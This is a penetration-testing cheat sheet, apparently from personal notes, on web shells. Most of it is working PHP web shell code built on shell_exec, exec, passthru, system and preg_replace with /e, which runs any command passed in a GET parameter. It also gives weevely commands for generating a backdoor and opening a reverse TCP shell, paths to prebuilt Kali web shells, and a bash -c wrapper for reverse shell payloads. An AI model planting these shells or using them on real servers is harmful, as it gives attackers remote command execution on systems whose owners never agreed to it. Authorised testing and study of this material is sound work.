Web shell
A web shell is a shell that is usually accessed from a browser. When possible, we want to use it as a foothold to move to reverse shell.
The language used in the web shell is determined by the language the target web server understand, such as PHP, JavaScript, or .NET. β¨
For JavaScript, you need to find a way for the website to execute your web shell. For PHP, visit the web shell URL.
β οΈ Password protect your webshells during assignments and/or randomize the parameter name (e.g., don't use cmd).
On Kali, you can use the preinstalled web shells in wordlists, or install and use SecLists webshells.
$ ls /usr/share/webshells
$ ls /usr/share/seclists/Web-Shells/
$ ls /usr/share/laudanum/ # edit and add the client (you?) IP
You may use the web shell to pop a reverse shell. Some payloads may not work smoothly according to the target configuration. Try:
bash -c "<reverse shell payload here>"
PHP web shell
PHP web shells are PHP files such as webshell.php. Once uploaded on the target, you can execute them by browsing them with a browser.
Most web shells below are using GET to take to command to run. For instance, [...]/webshell.php?cmd=id to run the id command.
Most commands below are complex to handle redirections, multi-line results, default command, etc. You can always get by using simple payloads like <?=system($_GET[0]??true);?> and using ?0=whoami.
shell_exec
This is a compacted web shell with shell_exec (doc).
<?="<pre>".shell_exec(($_GET['cmd'] ?? "whoami")." 2>&1")."</pre>"; ?>
You may replace ?= with ?php echo if not supported.
weevely3
This is a web shell using weevely3 (3.0k β).
# generate a webshell.php protected by "password"
$ weevely generate <password> webshell.php
# connect to the web shell
$ weevely URL/webshell.php <password>
# see help
# ex: create a reverse shell
$ :backdoor_reversetcp IP PORT
phpbash
You can use the semi-interactive phpbash (0.8k β, 2018 πͺ¦).
wwwolf
You can use the semi-interactive wwwolf (0.5k β, 2017 πͺ¦).
preg_replace
In PHP < 7.0.0, we could execute PHP code in preg_replace for each match found (since PHP 5.5, there is a deprecation warning).
<?php
echo preg_replace('/a/e', 'system("whoami");', 'a');
exec
This is a web shell using exec (doc)
<?php
$output = "";
exec(($_GET["cmd"] ?? "whoami")." 2>&1", $output);
echo "<pre>".implode('<br>', $output)."</pre>";
?>
passthru
This is a web shell using passthru (doc)
echo "<pre>";
echo passthru(($_GET["cmd"] ?? "whoami")." 2>&1");
echo "</pre>";
system
This is a web shell using system (doc)
<?php
echo "<pre>";
echo system(($_GET["cmd"] ?? "whoami")." 2>&1");
echo "</pre>";
?>
π» To-do π»
Stuff that I found, but never read/used yet.